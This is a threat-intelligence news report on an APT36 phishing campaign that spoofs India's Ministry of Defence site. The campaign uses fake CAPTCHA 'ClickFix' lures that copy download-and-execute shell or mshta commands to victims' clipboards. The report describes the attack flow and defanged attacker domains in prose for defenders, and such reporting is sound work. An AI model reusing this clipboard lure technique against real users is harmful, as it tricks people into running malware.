APT36 Expands ClickFix Technique for Linux Systems

Expanding the ClickFix campaign to target Linux systems, a new operation assessed to align with APT36 (aka Transparent Tribe) introduces cross-platform delivery techniques that now include Linux-based payloads, according to findings from Hunt.io. The activity centers around a phishing site that spoofs India’s Ministry of Defence press release portal. Review of the cloned page's HTML source shows it was created using HTTrack on March 7, 2025, and is hosted on the domain email[.]gov[.]in.drdosurvey[.]info. This mirrored site displays monthly archives spanning September 2023 to April 2025, with only the March 2025 entry linking to an active payload. The remainder of the content is static and non-functional, indicating either an early development stage or a narrowed targeting approach. The assessment of this campaign to APT36’s operations is based on infrastructure choices, lure design, and prior targeting history focused on Indian government and military interests.

The Linux-specific flow begins with a spoofed CAPTCHA page containing a button labeled "I'm not a rebot," which copies a shell command to the user's clipboard. If executed, this command downloads a shell script, "mapeal.sh," from the attacker-controlled domain trade4wealth[.]in, modifies permissions with "chmod +x," and runs the file. The page then redirects to a guide that walks the user through the manual execution process. While the payload currently lacks malicious functionality, Hunt.io notes: “As of this writing, the Linux payload (mapeal.sh) performs no observable malicious behavior,” suggesting the campaign may still be in development.

ClickFix approach. After the initial lure page, users encounter a full-screen “For Official Use Only” warning that camouflages a blurred government web portal. Once engaged, a JavaScript function silently places a command invoking "mshta.exe" with a remote HTA payload URL into the user’s clipboard. This HTA file contains heavily obfuscated JavaScript and delivers a .NET-based loader that initiates outbound connections to attacker infrastructure, including a spoofed subdomain, email[.]gov[.]in.avtzyu[.]store. To mask the operation, a legitimate-looking press release document is displayed to the user. This flow mirrors earlier ClickFix executions, reinforcing campaign attribution and operational consistency.

Though the underlying techniques are not new, Hunt.io emphasizes the broader detection strategy: “For defenders, the takeaway isn't tied to a single technique—it’s the way familiar methods are being reused in slightly new combinations. Look for signs like clipboard-delivered commands, spoofed government subdomains, shallow clones of trusted sites, and payloads staged under common web folders.” This campaign illustrates how well-understood TTPs continue to evolve incrementally, with added flexibility across operating systems.